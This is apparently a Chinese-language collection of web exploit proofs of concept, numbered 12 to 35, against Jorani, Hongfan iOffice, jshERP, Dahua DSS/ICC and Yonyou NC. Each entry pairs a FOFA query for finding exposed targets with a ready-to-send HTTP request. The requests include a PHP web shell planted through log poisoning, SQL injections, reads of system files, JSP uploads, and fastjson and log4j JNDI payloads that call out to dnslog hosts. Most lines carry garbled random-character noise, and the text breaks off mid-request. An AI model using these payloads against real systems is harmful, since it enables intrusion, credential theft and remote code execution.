GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1- H: G/ r2 N( w
Host: 127.0.0.1% v6 x1 n5 W: g: L! G3 I* N
Pragma: no-cache
1 }) Y: a; `: |- iCache-Control: no-cache
. n+ h% Q% {0 k; P3 q& ^Upgrade-Insecure-Requests: 1
6 q' F; L' W" ^% I2 o. bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. N6 f& h- s, u( LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! D5 {6 l4 I" W* i; I
Accept-Encoding: gzip, deflate
. f3 N! @+ G7 p+ aAccept-Language: zh-CN,zh;q=0.9,en;q=0.8) U% [7 B- V3 p; ^4 l
Connection: close* C5 \/ Z" [1 _- b
# z/ t. L$ T5 u" x' k# z
4 W4 ?" b' ~( S12. Jorani < 1.0.2 远程命令执行0 `* K" @2 ]6 g$ X+ L9 D, ]
FOFA:title="Jorani"
* f- i9 `) l. x' j5 ]: r1 T, l第一步先拿到cookie
+ d# c- c$ f- m' {* b$ f$ MGET /session/login HTTP/1.10 h7 `9 f7 N) R
Host: 192.168.190.30" f0 X+ V7 l& p% l) a
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
: t1 {* z+ l+ y# [ g+ B0 KConnection: close7 b4 y$ e. ~* ?% p, N# n
Accept-Encoding: gzip: f% D- x4 |; \9 K
1 m' t7 B' {& K% S, a( { s) Y
. x$ z5 g+ d' w响应中csrf_cookie_jorani用于后续请求) }! S# o% {5 W D" N2 w
HTTP/1.1 200 OK
8 m8 v3 ]8 U' n2 v8 Y$ R$ l0 }/ V/ x% C2 `Connection: close# c* f' s$ V7 G, g+ j
Cache-Control: no-store, no-cache, must-revalidate0 B6 P* H+ y w) l7 x
Content-Type: text/html; charset=UTF-8 M5 ~1 K3 H7 v U% a0 D* c
Date: Tue, 24 Oct 2023 09:34:28 GMT1 u! K/ M9 A9 Z1 ?7 M
Expires: Thu, 19 Nov 1981 08:52:00 GMT4 F# G* {, S$ O f n# E
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
& f6 U( w$ Y. H6 t# \5 bPragma: no-cache8 y `/ X, z8 K: p) t5 A! r9 y! L. I
Server: Apache/2.4.54 (Debian)/ K) ^' g& a3 G4 j. |$ f
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/' _& p7 n' ]) {
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
+ Q# o7 F' H }+ T- u2 o6 wVary: Accept-Encoding9 g( h9 T+ d4 {$ Q3 V7 ^0 R/ ]/ K
9 k$ b: D( _! Y7 X
7 A. a& I; P% e' x$ z6 C: vPOST请求,执行函数并进行base64编码* t( U7 e* f4 K
POST /session/login HTTP/1.1
. v$ @9 [. d3 @0 h% B# MHost: 192.168.190.30. W) N' x' c- j4 J' H+ c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% e. G/ R" _7 F5 i3 j
Connection: close5 t) z- X3 f9 S6 \/ i2 i
Content-Length: 252
% C. D; J' O; YContent-Type: application/x-www-form-urlencoded
& _! S6 X& i6 C5 E/ T1 rCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r( ^( w4 o" y0 k
Accept-Encoding: gzip
; ^- b U' b$ \
, ]0 s+ |6 K5 a/ dcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
* `! O, o- U- v" t3 {6 [ v8 m# J M( a
0 }2 b! K* d; F k4 a+ K3 l: Y: h% D. i6 }. K
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
- b6 e7 C9 b) B# yGET /pages/view/log-2023-10-24 HTTP/1.13 T1 `- b+ Q# Z: f( R+ ]
Host: 192.168.190.30% E0 Y+ L: ^2 o. C/ K7 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; k# u/ S1 y/ q% OConnection: close
: [2 D& X. b' q- T& k3 TCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
/ F- x" E0 x1 M6 J, Y( LK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
$ Y/ v, P( `; N$ JX-REQUESTED-WITH: XMLHttpRequest/ ^$ i t: ~& u! l2 O3 g1 s
Accept-Encoding: gzip4 }" x* C- n% e7 `; C7 I- V8 ^
: h1 A6 @# L! L5 ^
4 C/ F6 q, y! R13. 红帆iOffice ioFileDown任意文件读取* s5 I1 Z, a( b" U& k2 G
FOFA:app="红帆-ioffice"# v9 i" ^9 j; z2 _! r7 \
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
* y% Z! @$ c- B# f: xHost: x.x.x.x
* H' R$ U$ Z& K( D) ]# SUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.365 o+ }1 O+ B8 `: R d
Connection: close
, M. ~3 Y5 ]/ [8 E. G% q% I& ~3 Q) l6 H- AAccept: */*+ e! `+ Q# ^0 q2 J. b2 @3 L6 V6 ]3 K
Accept-Encoding: gzip' k3 [. @) h' {; C% W# K! O
, b5 d# \: {; L
: c& }( x/ z/ r0 L" e14. 华夏ERP(jshERP)敏感信息泄露
# k0 H# ~9 u+ _FOFA:body="jshERP-boot"0 t& z( l; L- L! i
泄露内容包括用户名密码
7 h& N J, h, JGET /jshERP-boot/user/getAllList;.ico HTTP/1.1+ @' Z& R1 t5 g I7 ^# m
Host: x.x.x.x3 H! ^& u0 F$ `8 B- i2 k$ `5 Y7 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36& s, ?1 F/ B$ ^
Connection: close2 L7 X: q6 D+ y1 j k) G
Accept: */*' F/ L- z3 t1 W: C* c4 ~
Accept-Language: en
/ Q5 [) T; y( x. L( |Accept-Encoding: gzip* {/ \5 w3 Q* b0 Z! _! `
. u+ q! M9 t9 j7 C& ^
' J: a& c: r5 B% r15. 华夏ERP getAllList信息泄露% x% U" F' M2 h" Y b
CVE-2024-0490
3 Y5 }9 f7 e2 SFOFA:body="jshERP-boot"# G# L$ z2 V. T! h
泄露内容包括用户名密码
: ^7 b. ?( d# e& tGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1 t& X0 D# n% G# T! q& ^+ x* A4 V
Host: 192.168.40.130:100
- e2 }: z3 E4 ?# R+ UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
^0 U$ M2 k8 X7 ^0 b. `: X5 g( LConnection: close
0 Z2 n1 o- m0 K6 m& Q2 XAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
6 ~! I9 [1 Y+ F0 J) I$ uAccept-Language: en
0 s/ D) z2 X( \: @, V/ `7 f, g$ Rsec-ch-ua-platform: Windows9 g: p( J( m* G1 ~' ]( u1 c0 y
Accept-Encoding: gzip
( a) u/ L, }# g }3 q7 j7 B
$ ]' S6 t+ d1 u) u) V3 I! | e4 Y3 p5 Z, y3 z: [( f. Z
16. 红帆HFOffice医微云SQL注入
9 H% m3 G% e1 y( c8 S0 Z: ~FOFA:title="HFOffice"7 b! K$ \9 U6 p) u! s4 Q. V' T
poc中调用函数计算1234的md5值$ o2 E) l/ c4 A: B; V9 J
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1" f, L, w1 S# j! x/ M4 U* F7 b+ p; `
Host: x.x.x.x
' B% m3 L$ L g' E lUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.364 v6 b0 B) v9 P+ V& [" R
Connection: close
$ b9 D8 G- ?" J8 b9 X& w7 U. IAccept: */*- x/ c9 M! B8 r! x: V. w, @
Accept-Language: en
" u3 B, w& }, u' V5 H; W" t3 o( TAccept-Encoding: gzip$ I. m5 N" i' c0 E4 M/ ^
- N# H& X- R$ o2 {& B0 Q7 _$ {% m
17. 大华 DSS itcBulletin SQL 注入
& ?. a7 ^# k) sFOFA:app="dahua-DSS"
5 X; p* F( \% m0 ?2 r0 p7 r4 HPOST /portal/services/itcBulletin?wsdl HTTP/1.1, b; J. O0 X1 C7 r' ?" u8 j% p
Host: x.x.x.x
3 |# [7 f3 ^/ a2 e" i) H, ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
p% r; K% T4 {Connection: close
( Y% m$ D$ U& b, \6 _Content-Length: 345
+ Z9 I- p# t E+ L6 t& sAccept-Encoding: gzip
$ [. r$ E' Q' p
/ b7 b# P8 r) O" A9 L/ b H& L g9 x: ~<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>5 A7 M9 {, G7 d9 J& q
<s11:Body>
0 z/ j5 u5 d5 P; T. W2 V) j <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>$ l1 _2 [& a7 j: ~+ a
<netMarkings>
3 C/ n( a1 {( Y3 u% k+ L) O6 `% i; z (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1$ h5 V) F. a% u/ i1 D* v
</netMarkings>& u! `! H/ Z7 O7 K
</ns1:deleteBulletin>
a+ a& a- A& P0 Q R </s11:Body>
. w. t0 X3 w$ A2 Z</s11:Envelope>' a# |+ [* z9 x9 m* g" I; w3 P
+ R; R& F$ w, U0 b
4 ~! [7 ?1 R D18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 I( p' r% w. y+ n/ E0 X- i
FOFA:app="dahua-DSS"& o7 y5 L- z6 d# l8 G& M
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.11 o7 d J5 l" o: B1 i1 y
Host: your-ip5 {. X( f5 L" l/ i" a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 ?7 M6 p) A7 K( |' {
Accept-Encoding: gzip, deflate" S' ]% _4 m* o) M( }* w( H& Z
Accept: */*
7 ?) B& U! a$ J# u3 z, c: UConnection: keep-alive+ O$ B% Q/ k( Q, ?5 P' k+ C2 j
) s9 s0 x' J. O. U3 N/ P, }( m
: e' \1 \: _6 c: F* `1 d9 C; _* X
/ ?. _3 U! a% s4 X! G* v5 C19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
: g/ j& t" |" A4 u7 n5 sFOFA:app="dahua-DSS"* F7 a) }' B4 b3 k/ U
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.15 c( @0 m0 O; p0 H0 n( o
Host:/ [) D. [+ _) v9 y$ |
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- `2 m5 r2 b$ D# P3 w8 HAccept-Encoding: gzip, deflate
7 F8 Y7 P0 F$ ^Accept: */* _! b( l, l4 { ]0 ~) U
Connection: keep-alive
% [2 e) k3 d- f* K8 \ ?# ?0 ~, L4 k0 U
3 a8 M6 ]+ a) \0 w- z% I A, C4 e4 W' S2 i
20. 大华ICC智能物联综合管理平台任意文件读取3 ? Z. o! H3 s* s# a) u4 ~
FOFA:body="*客户端会小于800*"
* P1 G# e# ?1 C6 l% y9 gGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
4 ^3 Z4 M2 K K/ r7 v, U0 OHost: x.x.x.x
( G8 D1 k4 c$ I7 e$ vUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. s3 a8 i' Q4 ?3 sConnection: close
" ]% S0 g0 L) h' F! a6 A" bAccept: */*' T' i: q8 ^" a
Accept-Language: en. H w( w7 P! q/ n4 r, \
Accept-Encoding: gzip1 a. \% n5 R( g" S6 z; l4 i
* I2 V1 T; A R* g9 M- S9 D: `
; C+ _% S5 N* t$ a
21. 大华ICC智能物联综合管理平台random远程代码执行
- t/ y( V* a6 E( I8 ^FOFA:icon_hash="-1935899595"
+ n' m- i% n. z; c7 Y8 d. LPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.13 Y9 d! b( P6 x2 _0 D& K
Host: x.x.x.x$ l1 v8 Q1 b* e( W; K: X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 Y7 K$ X' t* {0 UContent-Length: 161
/ d. t! ~: ?' r Y1 \Accept-Encoding: gzip- O# r) K% \; C5 f
Connection: close' F: e" \1 c$ w9 H" R
Content-Type: application/json;charset=utf-85 A2 s, t& h* W* c' z3 n
" G3 @3 G) s' B7 y
{6 }8 } A% {1 {1 A- c) \
"a":{7 q, H3 E9 n7 r M* @
"@type":"com.alibaba.fastjson.JSONObject",' O1 i$ U5 q& J7 F+ B1 }: v
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
5 I* R4 Y- P) F }""4 D8 r8 h( M! n" j4 c$ r
}
1 A& U% {$ ?7 Q( b
% k' \- i6 j) d/ e3 n
0 `5 I/ S. v+ O7 K- ^8 s5 j22. 大华ICC智能物联综合管理平台 log4j远程代码执行; U, E) C y. U6 H
FOFA:icon_hash="-1935899595"0 H4 C4 _, ? n8 u
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1; S1 F/ b6 ~& R/ k8 @
Host: your-ip
, x" h# x" b9 } y" hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 |& v- f4 i% D! H! u
Content-Type: application/json;charset=utf-8- ^: e* a* E5 R/ f# b" k. E
; ~/ x( N5 w1 V. C8 ?7 b, S' M{" T( W6 W$ i9 G/ d
"loginName":"${jndi:ldap://dnslog}"
p+ ]$ g9 F& {9 H3 p( n}
; F, p9 E/ Q- g/ o
+ e( b5 d) ]/ c4 T Q8 I& W8 h+ a; w! T& r" q
1 E$ m) A8 r6 E$ m$ S2 V
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行( q* W" D- q% x6 s
FOFA:icon_hash="-1935899595"
, t; t/ d6 x4 W/ m+ k2 B# O$ FPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
% a( h4 v* `5 THost: your-ip# B+ }2 f1 q- L3 O4 m1 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ i' C; c1 B4 ]
Content-Type: application/json;charset=utf-8! b3 |6 l8 M, E! @6 J: U
Accept-Encoding: gzip
! E" H, T3 j2 h3 ~6 QConnection: close
& v+ d) H6 z( s: ^& ^$ F
/ s* \, L) G+ j7 o/ Q6 }{
1 L( s( X' v% S' F6 V "a":{
" S7 [; |# S# r3 c2 b4 q "@type":"com.alibaba.fastjson.JSONObject",$ d, e- K; K8 M( W5 z. i
{"@type":"java.net.URL","val":"http://DNSLOG"}* m) _' t' V' Z: W
}""! {, S. j) e7 M4 h. `
}
8 p7 S5 v% ]; D# p4 y0 V' K
% W8 |; X% t, z9 S1 G/ T
/ s0 @9 t1 S8 a# K% z24. 用友NC 6.5 accept.jsp任意文件上传
_+ e- I& f4 W6 @FOFA:icon_hash="1085941792"; i! q# Z5 Y1 c3 n& k) i
POST /aim/equipmap/accept.jsp HTTP/1.12 a2 \" W* Z& U6 a" r9 P& f
Host: x.x.x.x8 _7 [4 L9 n+ V
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
8 D w0 h( F7 o2 l7 l, NConnection: close) ]- l$ S8 ?7 ~# X$ l% F2 V
Content-Length: 449 h0 v- }8 t5 a& R
Accept: */*
+ C r& M) I, f j2 B" l- WAccept-Encoding: gzip
' C. @! d8 n# f1 \" y8 MContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc+ g& z+ K" m6 I9 Q* A$ [
; J- P! l6 C( E n6 S
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
; ?6 e% ~% R) D" l7 CContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt": m. R& V) j) M1 t$ D# M
Content-Type: text/plain
$ P6 h' c9 V0 g; r- P; M; r( `
" B' b" M/ K& @4 r<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
* r4 M2 f) @1 L-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
" s, C; g0 n% A& [* YContent-Disposition: form-data; name="fname"
4 i8 n! s! l3 y0 g, v: N/ E0 X0 p. t, z6 C5 m& r
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp7 ?5 ?( K1 U3 B; x! A) Y
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--9 \! s- ^% g) M# z6 a8 e
! x2 W p$ N* b: U0 l& t7 j; [
( g3 t# o1 a: N6 |- I" T7 ]. T
25. 用友NC registerServlet JNDI 远程代码执行
& |# {5 X r3 B# w/ a. E8 F2 D% CFOFA:app="用友-UFIDA-NC"
9 Z; Z7 P0 ]5 mPOST /portal/registerServlet HTTP/1.1
* V2 p) ^9 E( x( W' I5 iHost: your-ip
( U. k/ b' o8 |: F, `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.06 U' t/ C2 M9 j2 T+ {) f: |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
' A2 W; ]7 Y8 S/ o& OAccept-Encoding: gzip, deflate1 s3 A9 G8 m T' u9 G* ~
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
& m1 n8 \4 M# \Content-Type: application/x-www-form-urlencoded
, {1 D$ B8 H9 X R( @9 [8 U0 A r2 g) x- I9 f
type=1&dsname=ldap://dnslog
' Q/ `2 I l- |* b6 \. T, \. H" i, E5 A. J2 q, Z- _/ f# J
" }, ^$ x1 B" _' w# R1 t+ r/ n: h! Y: C( q5 m
26. 用友NC linkVoucher SQL注入- h; g6 m9 r$ @ R; `2 v3 R7 P
FOFA:app="用友-UFIDA-NC"
/ P8 V" D1 L: c" ], {' i; ]GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: `" e r+ s% m, [! N" c8 {4 iHost: your-ip
: o- Z7 g; G, _/ xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 z2 Z- M( u ~" b% m/ m
Content-Type: application/x-www-form-urlencoded
/ @2 i _! u, }! FAccept-Encoding: gzip, deflate
8 h% ]/ v* u. G9 D' c, `1 ^Accept: */*
! U/ f9 i2 B; O8 A6 e% eConnection: keep-alive
: }/ _. F) e9 z, ?! y4 E4 W5 g" y0 q/ F, s( F) |
0 R! ^+ y* N( B0 e5 M
27. 用友 NC showcontent SQL注入- T) u0 ]% [1 ?' T( z0 I) X
FOFA:icon_hash="1085941792". H, `" h* T. C5 @
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
/ ]# t. ~- ^7 W0 h: u; z/ C# I- lHost: your-ip! K- }* Q* B' y6 l+ G, ~; N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ c; @- Y* U9 N
Accept-Encoding: identity# K; }5 J) Z1 g
Connection: close
% i# g8 y$ F" `" b/ e1 WContent-Type: text/xml; charset=utf-8% e; N. z) m; j$ M* U; a
2 p! {$ m9 V; s" K# W" H) P+ e
+ }6 q( ]- H5 N0 P; z/ a9 g
28. 用友NC grouptemplet 任意文件上传
% I1 u. w, c7 p! U# R+ hFOFA:icon_hash="1085941792") j' K: m* {- ^( W
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1( r4 h# A0 H6 @$ Z) j) ^4 z
Host: x.x.x.x/ e* K1 ]# g$ r+ U2 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
4 l- g9 y x# K0 s }Connection: close7 j: d. `- ~! E. m9 R: k: y, I
Content-Length: 268
8 ~4 e- k' Y9 A' u; BContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk8 ]7 }; N. s6 G( T- J% i* w0 v
Accept-Encoding: gzip
7 I1 M3 V$ Z$ I% k' V
& T. e2 e! u Q3 E2 Y------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
: Q/ K/ \% ~1 E4 Q/ XContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
6 ]3 }& `" V/ _/ H/ y3 h4 v" HContent-Type: application/octet-stream" ]2 }% K; x& Y1 M! b- c; Z3 \; q
5 @5 Z( }' l1 k ]8 p2 W, Q<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>& p$ s M7 f" o, H
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
& t3 C" t) `' Q9 C$ {) Q! |/ q5 Z& B( \1 v7 d/ \ H
" k+ Z' t( X3 \5 x( \/uapim/static/pages/nc/head.jsp
1 o" ]8 r2 |4 u3 ~ q1 l4 c8 ^2 C H
29. 用友NC down/bill SQL注入
+ B/ u$ e4 S W ^) u5 _& D& qFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"! g# {6 D% [5 e; }# u- Y2 P; V
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1/ K) f j+ R- }
Host: your-ip# [, A9 ?0 S, c5 L1 p' R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 K, ~" e0 |" H
Content-Type: application/x-www-form-urlencoded
1 q2 W) }6 M. D2 w7 CAccept-Encoding: gzip, deflate) l. a/ {$ O9 q* G3 P" [( g. J9 i
Accept: */* C; c; o3 H, p
Connection: keep-alive
) y& Y5 |$ t7 F; m4 y
- g4 w" \5 R; W9 y( y* P; v, \0 h3 l$ ^3 D2 z0 k
30. 用友NC importPml SQL注入
1 v5 b7 z# n5 oFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
/ Y. x' p/ ?6 u$ V3 e k( UPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1) u+ Z W7 w) J1 N3 a
Host: your-ip' }( G. Z4 z; C2 I" E% m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
( F& O# T; n) b& HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
6 s( w9 B7 p* [ t( {Connection: close! s. _& I! H9 o+ r8 J
- C; E+ w; H& v# J# f
------WebKitFormBoundaryH970hbttBhoCyj9V
- }3 _: \; p: E0 X1 hContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
; E8 T. P. Q4 IContent-Type: image/jpeg1 F" `* ?! N; ~7 Z
------WebKitFormBoundaryH970hbttBhoCyj9V--
; W' z/ L1 @; I% Z) L& T. c- i: {% n+ l' g9 ]
! p; t8 A' x. C! A3 Z# f+ S31. 用友NC runStateServlet SQL注入( n& o4 P5 p' F9 t# T9 {* {
version<=6.5- {. s3 U- h; w2 l1 _1 X
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
5 s/ y. e0 L% G" kGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
$ l/ Z. Q4 _, ` u. JHost: host( w) N- B! ?) V7 u) ]4 a3 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36: ^ k, f( G0 O! G
Content-Type: application/x-www-form-urlencoded" S: ~0 o) _, h# g) x: S" y$ W8 L
. S a% s7 j# D
5 x/ m( C( ?3 o6 E* O9 a% H32. 用友NC complainbilldetail SQL注入2 y$ S* H- P/ V1 B; T5 E
version= NC633、NC65
$ ?% g9 H; @& n/ S9 g2 H+ }FOFA:app="用友-UFIDA-NC"
% `& R) l# p7 ^8 t# h% hGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 H( D4 r; Y r4 g. `Host: your-ip
" W* M3 P6 L: EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. C6 ]/ g: S) n0 W @9 X+ _! \8 wContent-Type: application/x-www-form-urlencoded6 t9 s1 n+ k' P) K
Accept-Encoding: gzip, deflate" h2 r, d8 H) J2 U4 U* I% }6 g$ H
Accept: */*8 } v! u3 [- f' I w
Connection: keep-alive! Q% V' f8 z' ?# ?3 _
. f3 R& d: h4 l' M
- G; y5 U+ s- W33. 用友NC downTax/download SQL注入% D1 x/ b8 o# s) B$ K
version:NC6.5FOFA:app="用友-UFIDA-NC"
: l5 u' M" j. z6 {4 F; AGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1/ K( n& z! e$ k' r5 s: ]2 V' |
Host: your-ip) ?4 h8 R0 F4 f# J$ U4 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 u6 I5 V$ n0 y9 U9 N. t. y
Content-Type: application/x-www-form-urlencoded
! t- D$ t7 O* v" m2 [# q, A; uAccept-Encoding: gzip, deflate
* x1 B% W% q: w" qAccept: */*
2 y- i8 a. y- U4 K4 oConnection: keep-alive B' h' O1 l8 K" G9 ^! r
1 D2 U( m8 [& H) x7 U* _/ x* e/ D( @: b
34. 用友NC warningDetailInfo接口SQL注入
. A3 M1 j' M, I7 ^: D3 eFOFA:app="用友-UFIDA-NC"
: y" y$ j8 q, L9 p/ EGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.14 |7 Q- \( H. s7 J" M1 m6 J7 b
Host: your-ip; z9 H. t. g) p8 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 b" p' P! T$ |9 e6 E
Content-Type: application/x-www-form-urlencoded0 H9 Y& c: ~& v
Accept-Encoding: gzip, deflate
1 A) A- h1 P$ ]8 E( fAccept: */*
& L1 [. s8 [4 a" H LConnection: keep-alive. O" D, Q! [/ d3 G% V) S
3 C3 k4 H2 [5 ?0 _ U% D7 K
, a9 L( L. x, i- k
35. 用友NC-Cloud importhttpscer任意文件上传
8 Q( T! W0 A1 b5 W7 `& rFOFA:app="用友-NC-Cloud"# v5 Y* x+ v* M3 ?1 a J H
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1) A) _- M' E. D. w* q0 z9 W9 ]0 i
Host: 203.25.218.166:8888& ~5 d1 t+ q( f1 g- r
